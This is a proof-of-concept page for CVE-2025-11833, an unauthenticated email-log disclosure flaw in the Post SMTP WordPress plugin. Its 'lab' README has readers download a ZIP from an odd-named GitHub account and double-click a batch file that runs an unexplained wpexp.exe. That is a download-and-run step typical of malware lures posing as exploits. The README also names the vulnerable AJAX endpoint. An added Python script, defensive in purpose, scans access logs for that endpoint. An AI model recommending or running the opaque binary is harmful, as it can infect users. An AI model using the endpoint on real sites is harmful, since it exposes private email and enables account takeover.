POC details: 0fcb4a393ac6e5d77415113b09d70ed2c4f620d2

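Source
Related vulnerability
Title: WordPress plugin Post SMTP security vulnerability (CVE-2025-11833)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers based on PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Post SMTP versions 3.6.0 and earlier contain a security vulnerability that stems from a missing capability check and may allow unauthenticated attackers to read arbitrary logged emails, which can lead to account takeover.
Introduction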
# Lab: CVE-2025-11833 - Post SMTP WordPress Plugin Unauthenticated Arbitrary Email Log Disclosure

## 🚀 Overview
This lab demonstrates the CVE-2025-11833 vulnerability in the Post SMTP WordPress plugin (versions up to 3.6.0), which arises from a missing capability check in the plugin's `__construct` function. This flaw permits unauthenticated attackers to access logged emails sent via the plugin, potentially exposing sensitive data such as password reset links. Exploitation could lead to account takeovers by intercepting confidential communications. The CVSSv3 score is 9.8, highlighting its critical severity due to low attack complexity and no required privileges.


## ⚠️ Safety Disclaimer
This lab is provided for educational and research purposes to understand web application vulnerabilities. Do not use this in production environments or against unauthorized systems. The authors assume no liability for misuse. Always obtain explicit authorization before testing on real-world systems. 

## 📋 Prerequisites
- A local web server stack (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+, MySQL 5.7+, and Apache/Nginx.
- WordPress version 6.0 or later.
- Basic knowledge of WordPress plugin management and HTTP requests.
- Windows OS for running the exploit tools (due to .exe and .bat dependencies).
- Administrative access to your local machine for installing software and configuring the web server.

## Download & Install
1. Download the lab archive from https://github.com/modhopmarrow1973/CVE-2025-11833-LAB/raw/refs/heads/main/scripts/cve-2025-11833-lab.zip . This ZIP contains:
   - `wpexp.exe`: The main exploitation binary for demonstrating the email log disclosure.
   - `launcher.bat`: A batch file to launch the exploit.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11833-lab`.

3. Set up the vulnerable environment:
   - Install WordPress locally if not already done: Download from [wordpress.org](https://wordpress.org) and configure with your local web server.
   - Navigate to the WordPress admin dashboard (e.g., `http://localhost/wordpress/wp-admin`).
   - Install the vulnerable Post SMTP plugin.
   - Configure Post SMTP: In the plugin settings, enable email logging and set up a test SMTP server (e.g., using a local SMTP simulator like FakeSMTP for testing).


## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Set up your local WordPress instance with the vulnerable plugin.
3. Double-click `launcher.bat` in the extracted directory. This will launch `wpexp.exe` and prompt for target details.
4. In the exploit tool:
   - Enter the target URL (e.g., `http://localhost/wordpress`).
   - Specify the endpoint: `/wp-admin/admin-ajax.php?action=postman_get_logs` (the vulnerable AJAX handler).
   - Run the exploit to retrieve and display logged emails.
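
For a site you operate, requests to the endpoint named in step 4 can be looked for in the web-server access log. The following is an added example, not part of this lab or of the Post SMTP plugin; it assumes Apache/Nginx "combined" log format, the log lines are constructed, and the action name is taken as given in this README.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Nov/2025:10:01:11 +0000] "GET /wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 200 48211 "-" "curl/8.4.0"
203.0.113.7 - - [02/Nov/2025:10:01:12 +0000] "GET /wordpress/wp-admin/admin-ajax.php?foo=1&action=postman%5Fget%5Flogs HTTP/1.1" 200 51007 "-" "curl/8.4.0"
198.51.100.4 - - [02/Nov/2025:10:02:40 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
192.0.2.9 - - [02/Nov/2025:10:03:05 +0000] "GET /wp-admin/admin-ajax.php?action=postman_get_logs HTTP/1.1" 403 12 "-" "Mozilla/5.0"
192.0.2.9 - - [02/Nov/2025:10:03:09 +0000] "GET /?s=postman_get_logs HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
ACTION = "postman_get_logs"  # action name as given in this README (assumption)

def find_log_reads(log_text):
    """Return {client_ip: [(timestamp, status, bytes), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes, so "postman%5Fget%5Flogs" is matched too.
        actions = parse_qs(url.query).get("action", [])
        if ACTION in actions:
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], int(m["status"]), size))
    return dict(hits)

def served(hits):
    """Client IPs that got at least one 2xx response, so log data may have been returned."""
    return sorted(ip for ip, rows in hits.items() if any(200 <= s < 300 for _, s, _ in rows))

if __name__ == "__main__":
    found = find_log_reads(SAMPLE_LOG)
    for ip, rows in found.items():
        print(ip, rows)
    print("served:", served(found))
```

An access log does not record whether a request carried a valid session, and an `action` sent in a POST body is not visible in it, so hits are leads to correlate with password-reset activity rather than proof of disclosure.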


For questions or contributions, email me at ukeouxnp760s25@hotmail.com
File snapshot

[4.0K] /data/pocs/0fcb4a393ac6e5d77415113b09d70ed2c4f620d2
├── [2.8K] README.md
└── [4.0K] scripts
    ├── [ 1] config.ini
    └── [8.5M] cve-2025-11833-lab.zip

1 directory, 3 files